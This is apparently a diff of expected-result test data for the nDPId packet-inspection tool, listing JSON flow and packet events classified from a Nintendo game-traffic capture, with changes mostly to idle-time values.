-01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} -00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341201,"flow_last_seen":1500731341201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1500731341201,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1500731341201,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341201,"pkt":"AA6OGXEMfLuKifuECABFAAA8EZZAAEAGCkTAqAxyNsAbCHphAbtX9RrxAAAAAKACgAAP+wAAAgQFUAEDAwYEAggKABqqagAAAAA="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1500731341241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731341241,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZtk2wBsIwKgMcgG7emF9lpyBV\/Ua8qAScSBo2gAAAgQFrAQCCAqoOPNAABqqagEDAwg="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1500731341242,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731341242,"pkt":"AA6OGXEMfLuKifuECABFAAA0EZdAAEAGCkvAqAxyNsAbCHphAbtX9RryfZacgoAQAg4GiQAAAQEICgAaqpOoOPNA"} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731341201,"flow_last_seen":1500731341246,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731341246,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":158,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731341201,"flow_last_seen":1500731341285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731341285,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1500731322454,"flow_last_seen":1500731342041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1500731342041,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1500731342849,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1500731342849,"pkt":"AA6OGXEMfLuKifuECABFAABoEaUAAAQRdQ7AqAxyuXapQdpra4AAVCIdMquYZAIAAADswAAAiVxWTHQXYLkMmEhv3TFhCo9D90XwqWXbgOlZDx\/Hd+4rX5hDUY6wfFQBAZE4XnJazusJzbVQnhevgQppjVzdvQ=="} 00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731342849,"flow_last_seen":1500731342849,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731342849,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 
@@ -106,9 +106,9 @@ 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1500731340831,"flow_last_seen":1500731340889,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":10025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1500731340951,"flow_last_seen":1500731340966,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 
-00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":160,"flow_first_seen":1500731343266,"flow_last_seen":1500731348756,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":45024,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
@@ -121,8 +121,8 @@ 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1500731323269,"flow_last_seen":1500731323270,"flow_idle_time":180000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":180000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":180000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} -00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} 
+00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} +00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} 
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":447,"flow_first_seen":1500731342849,"flow_last_seen":1500731348749,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":168900,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1500731320644,"flow_last_seen":1500731325506,"flow_idle_time":180000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":812,"flow_tot_l4_payload_len":4452,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 